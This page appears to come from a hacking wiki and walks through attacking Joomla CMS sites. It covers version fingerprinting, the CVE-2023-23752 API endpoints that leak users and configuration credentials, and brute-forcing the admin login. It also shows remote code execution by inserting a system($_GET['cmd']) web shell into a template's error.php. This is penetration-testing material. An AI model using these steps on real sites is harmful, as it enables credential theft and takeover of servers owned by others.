Joomla

Learn & practice AWS Hacking: Learn & practice GCP Hacking:

Support HackTricks

Check the !
Join the 💬 or the or follow us on Twitter 🐦 .
Share hacking tricks by submitting PRs to the and github repos.

Joomla Statistics

Joomla collects some anonymous such as the breakdown of Joomla, PHP and database versions and server operating systems in use on Joomla installations. This data can be queried via their public .

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
    "data": {
        "cms_version": {
            "3.0": 0,
            "3.1": 0,
            "3.10": 6.33,
            "3.2": 0.01,
            "3.3": 0.02,
            "3.4": 0.05,
            "3.5": 12.24,
            "3.6": 22.85,
            "3.7": 7.99,
            "3.8": 17.72,
            "3.9": 27.24,
            "4.0": 3.21,
            "4.1": 1.53,
            "4.2": 0.82,
            "4.3": 0,
            "5.0": 0
        },
        "total": 2951032
    }
}

Enumeration

Discovery/Footprinting

Check the meta

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />

robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]

README.txt

1- What is this?
	* This is a Joomla! installation/upgrade package to version 3.x
	* Joomla! Official site: https://www.joomla.org
	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Version

In /administrator/manifests/files/joomla.xml you can see the version.
In /language/en-GB/en-GB.xml you can get the version of Joomla.
In plugins/system/cache/cache.xml you can see an approximate version.

Automatic

droopescan scan joomla --url http://joomla-site.local/

API Unauthenticated Information Disclosure:

Versions From 4.0.0 to 4.2.7 are vulnerable to Unauthenticated information disclosure (CVE-2023-23752) that will dump creds and other information.

Users: http://<host>/api/v1/users?public=true
Config File: http://<host>/api/index.php/v1/config/application?public=true

Brute-Force

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin
 
admin:admin

RCE

If you managed to get admin credentials you can RCE inside of it by adding a snippet of PHP code to gain RCE. We can do this by customizing a template.

Click on Templates on the bottom left under Configuration to pull up the templates menu.
Click on a template name. Let's choose protostar under the Template column header. This will bring us to the Templates: Customise page.
Finally, you can click on a page to pull up the page source. Let's choose the error.php page. We'll add a PHP one-liner to gain code execution as follows:
1. system($_GET['cmd']);
Save & Close
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

From XSS to RCE

- Privilege Escalation: Creates an user in Joomla.
- (RCE) Built-In Templates Edit: Edit a Built-In Templates in Joomla.
- (Custom) Custom Exploits: Custom Exploits for Third-Party Joomla Plugins.

Support HackTricks

PreviousJira & Confluence NextJSP

Last updated 7 months ago